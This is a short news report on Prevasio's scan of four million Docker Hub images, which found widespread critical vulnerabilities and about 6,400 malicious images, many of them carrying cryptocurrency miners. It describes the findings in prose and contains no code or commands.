Researchers from Prevasio studied 4,000,000 publicly available Docker images hosted on Docker Hub and found that more than half of them have critical vulnerabilities, and several thousand images contain malicious or potentially dangerous elements.
For the analysis, the specialists used its own Prevasio Analyzer service, which had to work non-stop for a month on 800 machines.
The analysis found that 51% of the 4,000,000 examined images contain packages or dependencies with at least one critical vulnerability, and another 13% are vulnerable to high severity bugs.
Approximately 6400 images (0.16% of the total) were classified as malicious or potentially dangerous due to the presence of malware, cryptocurrency miners, hacking tools, the malicious npm package ( flatmap-stream ) and Trojans in their composition . Worse, it turned out that all of these images were downloaded over 300,000,000 times.
Cryptocurrency miners were found in 44% of 6400 containers. Although in many cases the developers honestly report that their images contain miners, sometimes the miners are hidden.
“Regardless of the original intent, if an employee of a company uses Docker Hub and then launches an image with a miner at work, there is a high probability that the company’s resources will not be used as originally intended. The system administrator may consider such container images undesirable for a corporate environment or even potentially dangerous, ”the experts write.
Also, during the study, images with dynamic payloads were found, that is, the original image itself did not contain anything malicious, but later the similar miner code was loaded, compiled and executed by a special script.